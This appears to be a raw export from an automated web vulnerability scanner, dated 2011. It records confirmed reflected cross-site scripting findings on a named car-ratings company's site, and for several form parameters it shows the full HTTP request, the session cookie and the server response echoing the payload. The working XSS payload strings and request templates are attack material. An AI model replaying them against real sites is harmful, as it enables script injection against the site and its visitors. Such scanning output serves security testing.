class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CLIENTS</div><div class="sidemenu_item"><a href="clients.php">Past Clients</a></div><!--<div class="sidemenu_item"><a href="client_success.php">Success Stories</a></div>--><!--<div class="sidemenu_item"><a href="client_dao_login.php">DAO Login</a></div>--><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;DAO: Delight &amp; Opportunity</div> <div class="pagetext"> <p>User ID: <span class="blogtitle">'"--></style></script><script>netsparker(0x000C26)</script></span></p> <div class="pagesubtitle">Content</div> <p>Information goes here...</p> </div> <!-- End the page --> </td> </tr></table> <hr noshade size="1" color="#DDDDDD" width="760" align="center" /><table id="footertable" align="center"> <tr> <td align="left" valign="top" width="50%"> <a href="sitemap.php" class="footer">SITE MAP</a> &nbsp; | &nbsp; <!--<a href="privacy.php" class="footer">PRIVACY POLICY</a> &nbsp; | &nbsp; --> <a href="press_contacts.php" class="footer">CONTACT US</a> &nbsp; | &nbsp;<a href="admin.php" class="footer">ADMIN</a> &nbsp; | &nbsp; <a href="privacy.php" class="footer">PRIVACY</a> </td> <td align="right" valign="top" width="50%"> &copy; 2004-2011 Strategic Vision, Inc.<br /> Site by <!--<a href="http://www.nickbarrett.org" title="Nick Barrett" target="_blank" class="footer">Nick Barrett</a> &amp;--><a href="mailto:pgossling@gmail.com" class="footer">Philip Gossling</a> </td> </tr></table> </div> </td> <td width="5" bgcolor="#CCCCCC" background="images/content_rightshadow.gif">&nbsp;</td> </tr></table> </center> </body></html>
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST 3
numCars POST '"--></style></script><script>alert(0x000DD7)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=afhcg3f6rko9268c8qcoh7dha6
Content-Length: 200
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make=3&numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000DD7)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:54:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x000DD7)</script>" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="&..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 2011
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x000E0E)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=afhcg3f6rko9268c8qcoh7dha6
Content-Length: 200
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=2011&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E0E)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:55:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011" selected>2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option><option value="Acura">Acura</option><option value="Audi">Audi</option><option value="BMW">BMW</option><option value="Buick">Buick</option><option value="Cadillac">Cadillac</option><option value="Chevrolet">Chevrolet</option><option value="Chrysler">Chrysler</option><option value="Dodge">Dodge</option><option value="Ford">Ford</option><option value="GMC">GMC</option><option value="Honda">Honda</option><option value="Hyundai">Hyundai</option><option value="Infiniti">Infiniti</option><option value="Jaguar">Jaguar</option><option value="Jeep">Jeep</option><option value="Kia">Kia</option><option value="Land Rover">Land Rover</option><option value="Lexus">Lexus</option><option value="Lincoln">Lincoln</option><option value="Mazda">Mazda</option><option value="Mercedes-Benz">Mercedes-Benz</option><option value="Mercury">Mercury</option><option value="MINI">MINI</option><option value="Mitsubishi">Mitsubishi</option><option value="Nissan">Nissan</option><option value="Porsche">Porsche</option><option value="Ram">Ram</option><option value="Saab">Saab</option><option value="Scion">Scion</option><option value="Segment">Segment</option><option value="Subaru">Subaru</option><option value="Suzuki">Suzuki</option><option value="Toyota">Toyota</option><option value="Volkswagen">Volkswagen</option><option value="Volvo">Volvo</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="'"--></style></script><script>netsparker(0x000E0E)</script>" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="&..
- /ratings.php

/ratings.php CONFIRMED

